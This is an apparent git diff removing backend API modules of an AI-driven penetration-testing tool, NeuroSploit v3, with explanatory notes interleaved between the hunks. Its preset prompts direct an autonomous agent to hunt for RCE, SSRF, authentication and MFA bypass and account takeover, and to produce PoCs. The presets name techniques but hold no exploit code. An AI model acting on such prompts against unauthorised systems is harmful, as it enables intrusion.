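    counts = {status: 0 for status in STATUSES}
    for status, n in rows:
        if status in counts:  # ignore statuses outside the reported set
            counts[status] = n
    return counts


def demo_counts() -> dict:
    """Build an in-memory table with a few rows and summarize one scan."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE agent_tasks (id TEXT, scan_id TEXT, status TEXT)")
    conn.executemany(
        "INSERT INTO agent_tasks VALUES (?, ?, ?)",
        [
            ("t1", "s1", "completed"),
            ("t2", "s1", "completed"),
            ("t3", "s1", "pending"),
            ("t4", "s2", "failed"),  # belongs to another scan, must not be counted
        ],
    )
    return count_by_status(conn, "s1")
```

Pre-filling the dictionary with zeros keeps the response shape stable when a status has no rows.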
-144
View File
@@ -1,144 +0,0 @@
"""
CLI Agent API - Endpoints for CLI agent provider detection and methodology listing.
"""
import os
import glob
import logging
from typing import List, Dict, Optional
from fastapi import APIRouter
logger = logging.getLogger(__name__)
router = APIRouter(prefix="/api/v1/cli-agent", tags=["CLI Agent"])
# CLI providers that can run as autonomous agents
CLI_AGENT_PROVIDER_IDS = ["claude_code", "gemini_cli", "codex_cli"]
@router.get("/providers")
async def get_cli_providers() -> Dict:
"""List available CLI agent providers with connection status from SmartRouter."""
providers = []
try:
from backend.core.smart_router import get_registry
registry = get_registry()
except Exception:
registry = None
for pid in CLI_AGENT_PROVIDER_IDS:
provider_info = {
"id": pid,
"name": pid,
"connected": False,
"account_label": None,
"source": None,
}
if registry:
provider = registry.get_provider(pid)
if provider:
provider_info["name"] = provider.name
accounts = registry.get_active_accounts(pid)
if accounts:
provider_info["connected"] = True
provider_info["account_label"] = accounts[0].label
provider_info["source"] = accounts[0].source
providers.append(provider_info)
# Also check env var API keys as fallback
env_fallbacks = {
"claude_code": "ANTHROPIC_API_KEY",
"gemini_cli": "GEMINI_API_KEY",
"codex_cli": "OPENAI_API_KEY",
}
for p in providers:
if not p["connected"]:
env_key = env_fallbacks.get(p["id"], "")
if env_key and os.getenv(env_key, ""):
p["connected"] = True
p["source"] = "env_var"
p["account_label"] = f"${env_key}"
enabled = os.getenv("ENABLE_CLI_AGENT", "false").lower() == "true"
return {
"enabled": enabled,
"providers": providers,
"connected_count": sum(1 for p in providers if p["connected"]),
}
@router.get("/methodologies")
async def list_methodologies() -> Dict:
"""List available methodology .md files for CLI agent."""
methodologies: List[Dict] = []
seen_paths: set = set()
# 1. Check METHODOLOGY_FILE env var (default)
default_path = os.getenv("METHODOLOGY_FILE", "")
if default_path and os.path.exists(default_path):
size = os.path.getsize(default_path)
methodologies.append({
"name": os.path.basename(default_path),
"path": default_path,
"size": size,
"size_human": _human_size(size),
"is_default": True,
})
seen_paths.add(os.path.abspath(default_path))
# 2. Scan /opt/Prompts-PenTest/ for .md files
prompts_dir = "/opt/Prompts-PenTest"
if os.path.isdir(prompts_dir):
for md_file in sorted(glob.glob(os.path.join(prompts_dir, "*.md"))):
abs_path = os.path.abspath(md_file)
if abs_path in seen_paths:
continue
seen_paths.add(abs_path)
name = os.path.basename(md_file)
size = os.path.getsize(md_file)
# Only include pentest-related files (skip research reports, etc.)
name_lower = name.lower()
if any(kw in name_lower for kw in ["pentest", "prompt", "bugbounty", "methodology", "chunk"]):
methodologies.append({
"name": name,
"path": md_file,
"size": size,
"size_human": _human_size(size),
"is_default": False,
})
# 3. Check data/ directory
data_dir = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))), "data")
if os.path.isdir(data_dir):
for md_file in glob.glob(os.path.join(data_dir, "*methodology*.md")):
abs_path = os.path.abspath(md_file)
if abs_path not in seen_paths:
seen_paths.add(abs_path)
size = os.path.getsize(md_file)
methodologies.append({
"name": os.path.basename(md_file),
"path": md_file,
"size": size,
"size_human": _human_size(size),
"is_default": False,
})
return {
"methodologies": methodologies,
"total": len(methodologies),
}
def _human_size(size_bytes: int) -> str:
"""Convert bytes to human-readable size."""
if size_bytes < 1024:
return f"{size_bytes} B"
elif size_bytes < 1024 * 1024:
return f"{size_bytes / 1024:.1f} KB"
else:
return f"{size_bytes / (1024 * 1024):.1f} MB"
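The `/opt/Prompts-PenTest` scan keeps only Markdown files whose names contain one of a few keywords. A small sketch of that filter in isolation; `is_methodology_file` is a hypothetical helper, and the keyword list is copied from the handler above:

```python
METHODOLOGY_KEYWORDS = ("pentest", "prompt", "bugbounty", "methodology", "chunk")


def is_methodology_file(name: str) -> bool:
    """Return True for .md files whose lowercased name contains a methodology keyword."""
    name_lower = name.lower()
    if not name_lower.endswith(".md"):
        return False
    return any(keyword in name_lower for keyword in METHODOLOGY_KEYWORDS)
```

Pulling the check into one function would make the keyword list easier to test and extend.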
-299
View File
@@ -1,299 +0,0 @@
"""
NeuroSploit v3 - Dashboard API Endpoints
"""
from typing import List
from fastapi import APIRouter, Depends
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select, func
from datetime import datetime, timedelta
from backend.db.database import get_db
from backend.models import Scan, Vulnerability, Endpoint, AgentTask, Report
router = APIRouter()
@router.get("/stats")
async def get_dashboard_stats(db: AsyncSession = Depends(get_db)):
"""Get overall dashboard statistics"""
# Total scans
total_scans_result = await db.execute(select(func.count()).select_from(Scan))
total_scans = total_scans_result.scalar() or 0
# Scans by status
running_result = await db.execute(
select(func.count()).select_from(Scan).where(Scan.status == "running")
)
running_scans = running_result.scalar() or 0
completed_result = await db.execute(
select(func.count()).select_from(Scan).where(Scan.status == "completed")
)
completed_scans = completed_result.scalar() or 0
stopped_result = await db.execute(
select(func.count()).select_from(Scan).where(Scan.status == "stopped")
)
stopped_scans = stopped_result.scalar() or 0
failed_result = await db.execute(
select(func.count()).select_from(Scan).where(Scan.status == "failed")
)
failed_scans = failed_result.scalar() or 0
pending_result = await db.execute(
select(func.count()).select_from(Scan).where(Scan.status == "pending")
)
pending_scans = pending_result.scalar() or 0
# Total vulnerabilities by severity
vuln_counts = {}
for severity in ["critical", "high", "medium", "low", "info"]:
result = await db.execute(
select(func.count()).select_from(Vulnerability).where(Vulnerability.severity == severity)
)
vuln_counts[severity] = result.scalar() or 0
total_vulns = sum(vuln_counts.values())
# Total endpoints
endpoints_result = await db.execute(select(func.count()).select_from(Endpoint))
total_endpoints = endpoints_result.scalar() or 0
# Recent activity (last 7 days)
week_ago = datetime.utcnow() - timedelta(days=7)
recent_scans_result = await db.execute(
select(func.count()).select_from(Scan).where(Scan.created_at >= week_ago)
)
recent_scans = recent_scans_result.scalar() or 0
recent_vulns_result = await db.execute(
select(func.count()).select_from(Vulnerability).where(Vulnerability.created_at >= week_ago)
)
recent_vulns = recent_vulns_result.scalar() or 0
return {
"scans": {
"total": total_scans,
"running": running_scans,
"completed": completed_scans,
"stopped": stopped_scans,
"failed": failed_scans,
"pending": pending_scans,
"recent": recent_scans
},
"vulnerabilities": {
"total": total_vulns,
"critical": vuln_counts["critical"],
"high": vuln_counts["high"],
"medium": vuln_counts["medium"],
"low": vuln_counts["low"],
"info": vuln_counts["info"],
"recent": recent_vulns
},
"endpoints": {
"total": total_endpoints
}
}
@router.get("/recent")
async def get_recent_activity(
limit: int = 10,
db: AsyncSession = Depends(get_db)
):
"""Get recent scan activity"""
# Recent scans
scans_query = select(Scan).order_by(Scan.created_at.desc()).limit(limit)
scans_result = await db.execute(scans_query)
recent_scans = scans_result.scalars().all()
# Recent vulnerabilities
vulns_query = select(Vulnerability).order_by(Vulnerability.created_at.desc()).limit(limit)
vulns_result = await db.execute(vulns_query)
recent_vulns = vulns_result.scalars().all()
return {
"recent_scans": [s.to_dict() for s in recent_scans],
"recent_vulnerabilities": [v.to_dict() for v in recent_vulns]
}
@router.get("/findings")
async def get_recent_findings(
limit: int = 20,
severity: str | None = None,
db: AsyncSession = Depends(get_db)
):
"""Get recent vulnerability findings"""
query = select(Vulnerability).order_by(Vulnerability.created_at.desc())
if severity:
query = query.where(Vulnerability.severity == severity)
query = query.limit(limit)
result = await db.execute(query)
vulnerabilities = result.scalars().all()
return {
"findings": [v.to_dict() for v in vulnerabilities],
"total": len(vulnerabilities)
}
@router.get("/vulnerability-types")
async def get_vulnerability_distribution(db: AsyncSession = Depends(get_db)):
"""Get vulnerability distribution by type"""
query = select(
Vulnerability.vulnerability_type,
func.count(Vulnerability.id).label("count")
).group_by(Vulnerability.vulnerability_type)
result = await db.execute(query)
distribution = result.all()
return {
"distribution": [
{"type": row[0], "count": row[1]}
for row in distribution
]
}
@router.get("/scan-history")
async def get_scan_history(
days: int = 30,
db: AsyncSession = Depends(get_db)
):
"""Get scan history for charts"""
start_date = datetime.utcnow() - timedelta(days=days)
# Get scans grouped by date
scans = await db.execute(
select(Scan).where(Scan.created_at >= start_date).order_by(Scan.created_at)
)
all_scans = scans.scalars().all()
# Group by date
history = {}
for scan in all_scans:
date_str = scan.created_at.strftime("%Y-%m-%d")
if date_str not in history:
history[date_str] = {
"date": date_str,
"scans": 0,
"vulnerabilities": 0,
"critical": 0,
"high": 0
}
history[date_str]["scans"] += 1
history[date_str]["vulnerabilities"] += scan.total_vulnerabilities
history[date_str]["critical"] += scan.critical_count
history[date_str]["high"] += scan.high_count
return {"history": list(history.values())}
@router.get("/agent-tasks")
async def get_recent_agent_tasks(
limit: int = 20,
db: AsyncSession = Depends(get_db)
):
"""Get recent agent tasks across all scans"""
query = (
select(AgentTask)
.order_by(AgentTask.created_at.desc())
.limit(limit)
)
result = await db.execute(query)
tasks = result.scalars().all()
return {
"agent_tasks": [t.to_dict() for t in tasks],
"total": len(tasks)
}
@router.get("/activity-feed")
async def get_activity_feed(
limit: int = 30,
db: AsyncSession = Depends(get_db)
):
"""Get unified activity feed with all recent events"""
activities = []
# Get recent scans
scans_result = await db.execute(
select(Scan).order_by(Scan.created_at.desc()).limit(limit // 3)
)
for scan in scans_result.scalars().all():
activities.append({
"type": "scan",
"action": f"Scan {scan.status}",
"title": scan.name or "Unnamed Scan",
"description": f"{scan.total_vulnerabilities} vulnerabilities found",
"status": scan.status,
"severity": None,
"timestamp": scan.created_at.isoformat(),
"scan_id": scan.id,
"link": f"/scan/{scan.id}"
})
# Get recent vulnerabilities
vulns_result = await db.execute(
select(Vulnerability).order_by(Vulnerability.created_at.desc()).limit(limit // 3)
)
for vuln in vulns_result.scalars().all():
activities.append({
"type": "vulnerability",
"action": "Vulnerability found",
"title": vuln.title,
"description": vuln.affected_endpoint or "",
"status": None,
"severity": vuln.severity,
"timestamp": vuln.created_at.isoformat(),
"scan_id": vuln.scan_id,
"link": f"/scan/{vuln.scan_id}"
})
# Get recent agent tasks
tasks_result = await db.execute(
select(AgentTask).order_by(AgentTask.created_at.desc()).limit(limit // 3)
)
for task in tasks_result.scalars().all():
activities.append({
"type": "agent_task",
"action": f"Task {task.status}",
"title": task.task_name,
"description": task.result_summary or task.description or "",
"status": task.status,
"severity": None,
"timestamp": task.created_at.isoformat(),
"scan_id": task.scan_id,
"link": f"/scan/{task.scan_id}"
})
# Get recent reports
reports_result = await db.execute(
select(Report).order_by(Report.generated_at.desc()).limit(limit // 4)
)
for report in reports_result.scalars().all():
activities.append({
"type": "report",
"action": "Report generated" if report.auto_generated else "Report created",
"title": report.title or "Report",
"description": f"{report.format.upper()} format",
"status": "auto" if report.auto_generated else "manual",
"severity": None,
"timestamp": report.generated_at.isoformat(),
"scan_id": report.scan_id,
"link": "/reports"
})
# Sort all activities by timestamp (newest first)
activities.sort(key=lambda x: x["timestamp"], reverse=True)
return {
"activities": activities[:limit],
"total": len(activities)
}
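The activity feed above merges several per-source lists and sorts them by their ISO 8601 `timestamp` strings. String comparison matches chronological order only when all timestamps share one format and timezone convention. A sketch under that assumption, with the hypothetical helper `merge_feed`:

```python
from datetime import datetime, timedelta


def merge_feed(*sources, limit=30):
    """Flatten the source lists, sort newest first by ISO timestamp, keep `limit` items."""
    merged = [item for source in sources for item in source]
    merged.sort(key=lambda item: item["timestamp"], reverse=True)
    return merged[:limit]


def demo_feed():
    """Merge three single-item sources and return the types of the two newest events."""
    base = datetime(2026, 1, 1, 12, 0, 0)
    scans = [{"type": "scan", "timestamp": (base - timedelta(hours=2)).isoformat()}]
    vulns = [{"type": "vulnerability", "timestamp": base.isoformat()}]
    tasks = [{"type": "agent_task", "timestamp": (base - timedelta(hours=1)).isoformat()}]
    return [item["type"] for item in merge_feed(scans, vulns, tasks, limit=2)]
```

If some rows carried timezone offsets and others did not, sorting on parsed `datetime` values would be the safer choice.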
-38
View File
@@ -1,38 +0,0 @@
"""
NeuroSploit v3 - FULL AI Testing API
Serves the comprehensive pentest prompt and manages FULL AI testing sessions.
"""
import logging
from pathlib import Path
from fastapi import APIRouter, HTTPException
logger = logging.getLogger(__name__)
router = APIRouter()
# Default prompt file path - English translation preferred, fallback to original
PROMPT_PATH_EN = Path("/opt/Prompts-PenTest/pentestcompleto_en.md")
PROMPT_PATH_PT = Path("/opt/Prompts-PenTest/pentestcompleto.md")
PROMPT_PATH = PROMPT_PATH_EN if PROMPT_PATH_EN.exists() else PROMPT_PATH_PT
@router.get("/prompt")
async def get_full_ia_prompt():
"""Return the comprehensive pentest prompt content."""
if not PROMPT_PATH.exists():
raise HTTPException(
status_code=404,
detail=f"Pentest prompt file not found at {PROMPT_PATH}"
)
try:
content = PROMPT_PATH.read_text(encoding="utf-8")
return {
"content": content,
"path": str(PROMPT_PATH),
"size": len(content),
"lines": content.count("\n") + 1,
}
except Exception as e:
logger.error("Failed to read prompt file: %s", e)
raise HTTPException(status_code=500, detail=str(e))
-172
@@ -1,172 +0,0 @@
"""
NeuroSploit v3 - Knowledge Management API
Upload, manage, and query custom security knowledge documents.
"""
import os
from typing import Optional, List
from fastapi import APIRouter, HTTPException, UploadFile, File, Query
from pydantic import BaseModel
router = APIRouter()
# Lazy-loaded processor instance
_processor = None
def _get_processor():
global _processor
if _processor is None:
from backend.core.knowledge_processor import KnowledgeProcessor
# Try to get LLM client for AI analysis
llm = None
try:
from backend.core.autonomous_agent import LLMClient
client = LLMClient()
if client.is_available():
llm = client
except Exception:
pass
_processor = KnowledgeProcessor(llm_client=llm)
return _processor
# --- Schemas ---
class KnowledgeDocumentResponse(BaseModel):
id: str
filename: str
title: str
source_type: str
uploaded_at: str
processed: bool
file_size_bytes: int
summary: str
vuln_types: List[str]
entries_count: int
class KnowledgeEntryResponse(BaseModel):
vuln_type: str
methodology: str = ""
payloads: List[str] = []
key_insights: str = ""
bypass_techniques: List[str] = []
source_document: str = ""
class KnowledgeStatsResponse(BaseModel):
total_documents: int
total_entries: int
vuln_types_covered: List[str]
storage_bytes: int
# --- Endpoints ---
@router.post("/upload", response_model=KnowledgeDocumentResponse)
async def upload_knowledge(file: UploadFile = File(...)):
"""Upload a security document for knowledge extraction.
Supported formats: PDF, Markdown (.md), Text (.txt), HTML
The document will be analyzed and indexed by vulnerability type.
"""
if not file.filename:
raise HTTPException(400, "Filename is required")
# Read file content
content = await file.read()
if len(content) > 50 * 1024 * 1024: # 50MB limit
raise HTTPException(413, "File too large (max 50MB)")
if len(content) == 0:
raise HTTPException(400, "Empty file")
processor = _get_processor()
try:
doc = await processor.process_upload(content, file.filename)
except ValueError as e:
raise HTTPException(400, str(e))
except Exception as e:
raise HTTPException(500, f"Processing failed: {str(e)}")
return KnowledgeDocumentResponse(
id=doc["id"],
filename=doc["filename"],
title=doc["title"],
source_type=doc["source_type"],
uploaded_at=doc["uploaded_at"],
processed=doc["processed"],
file_size_bytes=doc["file_size_bytes"],
summary=doc["summary"],
vuln_types=doc["vuln_types"],
entries_count=len(doc.get("knowledge_entries", [])),
)
@router.get("/documents", response_model=List[KnowledgeDocumentResponse])
async def list_documents():
"""List all indexed knowledge documents."""
processor = _get_processor()
docs = processor.get_documents()
return [
KnowledgeDocumentResponse(
id=d["id"],
filename=d["filename"],
title=d["title"],
source_type=d["source_type"],
uploaded_at=d["uploaded_at"],
processed=d["processed"],
file_size_bytes=d["file_size_bytes"],
summary=d["summary"],
vuln_types=d["vuln_types"],
entries_count=d["entries_count"],
)
for d in docs
]
@router.get("/documents/{doc_id}")
async def get_document(doc_id: str):
"""Get a specific document with its full knowledge entries."""
processor = _get_processor()
doc = processor.get_document(doc_id)
if not doc:
raise HTTPException(404, f"Document '{doc_id}' not found")
return doc
@router.delete("/documents/{doc_id}")
async def delete_document(doc_id: str):
"""Delete a knowledge document and its index entries."""
processor = _get_processor()
deleted = processor.delete_document(doc_id)
if not deleted:
raise HTTPException(404, f"Document '{doc_id}' not found")
return {"message": f"Document '{doc_id}' deleted", "id": doc_id}
@router.get("/search", response_model=List[KnowledgeEntryResponse])
async def search_knowledge(vuln_type: str = Query(..., description="Vulnerability type to search")):
"""Search knowledge entries by vulnerability type."""
processor = _get_processor()
entries = processor.search_by_vuln_type(vuln_type)
return [
KnowledgeEntryResponse(
vuln_type=e.get("vuln_type", ""),
methodology=e.get("methodology", ""),
payloads=e.get("payloads", []),
key_insights=e.get("key_insights", ""),
bypass_techniques=e.get("bypass_techniques", []),
source_document=e.get("source_document", ""),
)
for e in entries
]
@router.get("/stats", response_model=KnowledgeStatsResponse)
async def get_stats():
"""Get knowledge base statistics."""
processor = _get_processor()
stats = processor.get_stats()
return KnowledgeStatsResponse(**stats)
-320
@@ -1,320 +0,0 @@
"""
NeuroSploit v3 - MCP Server Management API
CRUD for Model Context Protocol server connections.
Persists to config/config.json mcp_servers section.
"""
import json
import asyncio
from pathlib import Path
from typing import Optional, List, Dict
from fastapi import APIRouter, HTTPException
from pydantic import BaseModel, Field
router = APIRouter()
CONFIG_PATH = Path(__file__).parent.parent.parent.parent / "config" / "config.json"
BUILTIN_SERVER = "neurosploit_tools"
# --- Schemas ---
class MCPServerCreate(BaseModel):
name: str = Field(..., min_length=1, max_length=100, description="Unique server identifier")
transport: str = Field("stdio", description="Transport type: stdio or sse")
command: Optional[str] = Field(None, description="Command for stdio transport")
args: Optional[List[str]] = Field(None, description="Args for stdio transport")
url: Optional[str] = Field(None, description="URL for sse transport")
env: Optional[Dict[str, str]] = Field(None, description="Environment variables")
description: str = Field("", description="Server description")
enabled: bool = Field(True, description="Whether server is enabled")
class MCPServerUpdate(BaseModel):
transport: Optional[str] = None
command: Optional[str] = None
args: Optional[List[str]] = None
url: Optional[str] = None
env: Optional[Dict[str, str]] = None
description: Optional[str] = None
enabled: Optional[bool] = None
class MCPServerResponse(BaseModel):
name: str
transport: str
command: Optional[str] = None
args: Optional[List[str]] = None
url: Optional[str] = None
env: Optional[Dict[str, str]] = None
description: str = ""
enabled: bool = True
is_builtin: bool = False
class MCPToolResponse(BaseModel):
name: str
description: str
server_name: str
# --- Config helpers ---
def _read_config() -> dict:
if not CONFIG_PATH.exists():
return {}
with open(CONFIG_PATH) as f:
return json.load(f)
def _write_config(config: dict):
with open(CONFIG_PATH, "w") as f:
json.dump(config, f, indent=4)
def _get_mcp_servers(config: dict) -> dict:
return config.get("mcp_servers", {})
def _server_to_response(name: str, server: dict) -> MCPServerResponse:
return MCPServerResponse(
name=name,
transport=server.get("transport", "stdio"),
command=server.get("command"),
args=server.get("args"),
url=server.get("url"),
env=server.get("env"),
description=server.get("description", ""),
enabled=server.get("enabled", True),
is_builtin=(name == BUILTIN_SERVER),
)
# --- Endpoints ---
@router.get("/servers", response_model=List[MCPServerResponse])
async def list_servers():
"""List all configured MCP servers."""
config = _read_config()
servers = _get_mcp_servers(config)
return [_server_to_response(name, srv) for name, srv in servers.items()]
@router.get("/servers/{name}", response_model=MCPServerResponse)
async def get_server(name: str):
"""Get a specific MCP server configuration."""
config = _read_config()
servers = _get_mcp_servers(config)
if name not in servers:
raise HTTPException(404, f"MCP server '{name}' not found")
return _server_to_response(name, servers[name])
@router.post("/servers", response_model=MCPServerResponse)
async def create_server(body: MCPServerCreate):
"""Add a new MCP server configuration."""
config = _read_config()
if "mcp_servers" not in config:
config["mcp_servers"] = {}
servers = config["mcp_servers"]
if body.name in servers:
raise HTTPException(409, f"Server '{body.name}' already exists")
# Validate transport-specific fields
if body.transport == "stdio" and not body.command:
raise HTTPException(400, "stdio transport requires 'command' field")
if body.transport == "sse" and not body.url:
raise HTTPException(400, "sse transport requires 'url' field")
server_config = {
"transport": body.transport,
"description": body.description,
"enabled": body.enabled,
}
if body.command:
server_config["command"] = body.command
if body.args:
server_config["args"] = body.args
if body.url:
server_config["url"] = body.url
if body.env:
server_config["env"] = body.env
servers[body.name] = server_config
_write_config(config)
return _server_to_response(body.name, server_config)
@router.put("/servers/{name}", response_model=MCPServerResponse)
async def update_server(name: str, body: MCPServerUpdate):
"""Update an MCP server configuration."""
config = _read_config()
servers = _get_mcp_servers(config)
if name not in servers:
raise HTTPException(404, f"MCP server '{name}' not found")
srv = servers[name]
if body.transport is not None:
srv["transport"] = body.transport
if body.command is not None:
srv["command"] = body.command
if body.args is not None:
srv["args"] = body.args
if body.url is not None:
srv["url"] = body.url
if body.env is not None:
srv["env"] = body.env
if body.description is not None:
srv["description"] = body.description
if body.enabled is not None:
srv["enabled"] = body.enabled
_write_config(config)
return _server_to_response(name, srv)
@router.delete("/servers/{name}")
async def delete_server(name: str):
"""Delete an MCP server configuration."""
if name == BUILTIN_SERVER:
raise HTTPException(403, f"Cannot delete built-in server '{BUILTIN_SERVER}'")
config = _read_config()
servers = _get_mcp_servers(config)
if name not in servers:
raise HTTPException(404, f"MCP server '{name}' not found")
del servers[name]
_write_config(config)
return {"message": f"Server '{name}' deleted"}
@router.post("/servers/{name}/toggle", response_model=MCPServerResponse)
async def toggle_server(name: str):
"""Toggle a server's enabled state."""
config = _read_config()
servers = _get_mcp_servers(config)
if name not in servers:
raise HTTPException(404, f"MCP server '{name}' not found")
srv = servers[name]
srv["enabled"] = not srv.get("enabled", True)
_write_config(config)
return _server_to_response(name, srv)
@router.post("/servers/{name}/test")
async def test_server_connection(name: str):
"""Test connection to an MCP server."""
config = _read_config()
servers = _get_mcp_servers(config)
if name not in servers:
raise HTTPException(404, f"MCP server '{name}' not found")
srv = servers[name]
transport = srv.get("transport", "stdio")
try:
if transport == "sse":
# Test SSE endpoint
import aiohttp
url = srv.get("url", "")
if not url:
return {"success": False, "error": "No URL configured", "tools_count": 0}
async with aiohttp.ClientSession() as session:
async with session.get(url, timeout=aiohttp.ClientTimeout(total=5)) as resp:
if resp.status < 400:
return {"success": True, "message": f"SSE endpoint reachable (HTTP {resp.status})", "tools_count": 0}
return {"success": False, "error": f"HTTP {resp.status}", "tools_count": 0}
elif transport == "stdio":
# Test stdio by checking command exists
import shutil
command = srv.get("command", "")
if not command:
return {"success": False, "error": "No command configured", "tools_count": 0}
if shutil.which(command):
return {"success": True, "message": f"Command '{command}' found in PATH", "tools_count": 0}
else:
return {"success": False, "error": f"Command '{command}' not found in PATH", "tools_count": 0}
except asyncio.TimeoutError:
return {"success": False, "error": "Connection timed out (5s)", "tools_count": 0}
except Exception as e:
return {"success": False, "error": str(e), "tools_count": 0}
@router.get("/servers/{name}/tools", response_model=List[MCPToolResponse])
async def list_server_tools(name: str):
"""List available tools from an MCP server.
For the built-in server, returns tools from the registry.
For external servers, attempts to connect and query.
"""
config = _read_config()
servers = _get_mcp_servers(config)
if name not in servers:
raise HTTPException(404, f"MCP server '{name}' not found")
# For builtin server, return tools from the MCP server module
if name == BUILTIN_SERVER:
try:
from core.mcp_server import TOOLS
return [
MCPToolResponse(
name=t["name"],
description=t.get("description", ""),
server_name=name,
)
for t in TOOLS
]
except ImportError:
return []
# For external servers, try to connect via MCPToolClient
try:
from core.mcp_client import MCPToolClient
# Build minimal config for this single server
client_config = {
"mcp_servers": {
"enabled": True,
"servers": {name: servers[name]}
}
}
client = MCPToolClient(client_config)
connected = await asyncio.wait_for(client.connect(name), timeout=10)
if not connected:
raise HTTPException(502, f"Failed to connect to MCP server '{name}'")
tools_dict = await client.list_tools(name)
tool_list = tools_dict.get(name, [])
await client.disconnect_all()
return [
MCPToolResponse(
name=t.get("name", ""),
description=t.get("description", ""),
server_name=name,
)
for t in tool_list
]
except ImportError:
raise HTTPException(501, "MCP client library not installed")
except asyncio.TimeoutError:
raise HTTPException(504, "Connection to MCP server timed out (10s)")
except HTTPException:
raise
except Exception as e:
raise HTTPException(502, f"Failed to list tools: {str(e)}")
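The transport checks in `create_server` accept any transport string and only validate the fields for `stdio` and `sse`. A minimal sketch of how that validation could be pulled into one helper that also rejects unknown transports; `validate_transport` and `SUPPORTED_TRANSPORTS` are hypothetical names, and rejecting unknown transports is an assumption that goes beyond what the original endpoint does:

```python
from typing import Optional

# Assumption: only the two transports named in the schema description are valid.
SUPPORTED_TRANSPORTS = {"stdio", "sse"}


def validate_transport(
    transport: str, command: Optional[str], url: Optional[str]
) -> Optional[str]:
    """Return an error message for an invalid combination, or None if it is valid."""
    if transport not in SUPPORTED_TRANSPORTS:
        return f"unsupported transport '{transport}'"
    if transport == "stdio" and not command:
        return "stdio transport requires 'command' field"
    if transport == "sse" and not url:
        return "sse transport requires 'url' field"
    return None
```

Returning a message instead of raising keeps the helper independent of FastAPI; an endpoint could map a non-`None` result to a 400 response.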
-372
@@ -1,372 +0,0 @@
"""
NeuroSploit v3 - Prompts API Endpoints
"""
from typing import List, Optional
from fastapi import APIRouter, Depends, HTTPException, UploadFile, File
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select
from backend.db.database import get_db
from backend.models import Prompt
from backend.schemas.prompt import (
PromptCreate, PromptUpdate, PromptResponse, PromptParse, PromptParseResult, PromptPreset
)
from backend.core.prompt_engine.parser import PromptParser
router = APIRouter()
# Preset prompts
PRESET_PROMPTS = [
{
"id": "full_pentest",
"name": "Full Penetration Test",
"description": "Comprehensive security assessment covering all vulnerability categories",
"category": "pentest",
"content": """Perform a comprehensive penetration test on the target application.
Test for ALL vulnerability categories:
- Injection vulnerabilities (XSS, SQL Injection, Command Injection, LDAP, XPath, Template Injection)
- Authentication flaws (Broken auth, session management, JWT issues, OAuth flaws)
- Authorization issues (IDOR, BOLA, privilege escalation, access control bypass)
- File handling vulnerabilities (LFI, RFI, path traversal, file upload, XXE)
- Request forgery (SSRF, CSRF)
- API security issues (rate limiting, mass assignment, excessive data exposure)
- Client-side vulnerabilities (CORS misconfig, clickjacking, open redirect)
- Information disclosure (error messages, stack traces, sensitive data exposure)
- Infrastructure issues (security headers, SSL/TLS, HTTP methods)
- Business logic flaws (race conditions, workflow bypass)
Use thorough testing with multiple payloads and bypass techniques.
Generate detailed PoC for each vulnerability found.
Provide remediation recommendations."""
},
{
"id": "owasp_top10",
"name": "OWASP Top 10",
"description": "Test for OWASP Top 10 2021 vulnerabilities",
"category": "compliance",
"content": """Test for OWASP Top 10 2021 vulnerabilities:
A01:2021 - Broken Access Control
- IDOR, privilege escalation, access control bypass, CORS misconfig
A02:2021 - Cryptographic Failures
- Sensitive data exposure, weak encryption, cleartext transmission
A03:2021 - Injection
- SQL injection, XSS, command injection, LDAP injection
A04:2021 - Insecure Design
- Business logic flaws, missing security controls
A05:2021 - Security Misconfiguration
- Default configs, unnecessary features, missing headers
A06:2021 - Vulnerable and Outdated Components
- Outdated libraries, known CVEs
A07:2021 - Identification and Authentication Failures
- Weak passwords, session fixation, credential stuffing
A08:2021 - Software and Data Integrity Failures
- Insecure deserialization, CI/CD vulnerabilities
A09:2021 - Security Logging and Monitoring Failures
- Missing audit logs, insufficient monitoring
A10:2021 - Server-Side Request Forgery (SSRF)
- Internal network access, cloud metadata exposure"""
},
{
"id": "api_security",
"name": "API Security Testing",
"description": "Focused testing for REST and GraphQL APIs",
"category": "api",
"content": """Perform API security testing:
Authentication & Authorization:
- Test JWT implementation (algorithm confusion, signature bypass, claim manipulation)
- OAuth/OIDC flow testing
- API key exposure and validation
- Rate limiting bypass
- BOLA/IDOR on all endpoints
Input Validation:
- SQL injection on API parameters
- NoSQL injection
- Command injection
- Parameter pollution
- Mass assignment vulnerabilities
Data Exposure:
- Excessive data exposure in responses
- Sensitive data in error messages
- Information disclosure in headers
- Debug endpoints exposure
GraphQL Specific (if applicable):
- Introspection enabled
- Query depth attacks
- Batching attacks
- Field suggestion exploitation
API Abuse:
- Rate limiting effectiveness
- Resource exhaustion
- Denial of service vectors"""
},
{
"id": "bug_bounty",
"name": "Bug Bounty Hunter",
"description": "Focus on high-impact, bounty-worthy vulnerabilities",
"category": "bug_bounty",
"content": """Hunt for high-impact vulnerabilities suitable for bug bounty:
Priority 1 - Critical Impact:
- Remote Code Execution (RCE)
- SQL Injection leading to data breach
- Authentication bypass
- SSRF to internal services/cloud metadata
- Privilege escalation to admin
Priority 2 - High Impact:
- Stored XSS
- IDOR on sensitive resources
- Account takeover vectors
- Payment/billing manipulation
- PII exposure
Priority 3 - Medium Impact:
- Reflected XSS
- CSRF on sensitive actions
- Information disclosure
- Rate limiting bypass
- Open redirects (if exploitable)
Look for:
- Unique attack chains
- Business logic flaws
- Edge cases and race conditions
- Bypass techniques for existing security controls
Document with clear PoC and impact assessment."""
},
{
"id": "quick_scan",
"name": "Quick Security Scan",
"description": "Fast scan for common vulnerabilities",
"category": "quick",
"content": """Perform a quick security scan for common vulnerabilities:
- Reflected XSS on input parameters
- Basic SQL injection testing
- Directory traversal/LFI
- Security headers check
- SSL/TLS configuration
- Common misconfigurations
- Information disclosure
Use minimal payloads for speed.
Focus on quick wins and obvious issues."""
},
{
"id": "auth_testing",
"name": "Authentication Testing",
"description": "Focus on authentication and session management",
"category": "auth",
"content": """Test authentication and session management:
Login Functionality:
- Username enumeration
- Password brute force protection
- Account lockout bypass
- Credential stuffing protection
- SQL injection in login
Session Management:
- Session token entropy
- Session fixation
- Session timeout
- Cookie security flags (HttpOnly, Secure, SameSite)
- Session invalidation on logout
Password Reset:
- Token predictability
- Token expiration
- Account enumeration
- Host header injection
Multi-Factor Authentication:
- MFA bypass techniques
- Backup codes weakness
- Rate limiting on OTP
OAuth/SSO:
- State parameter validation
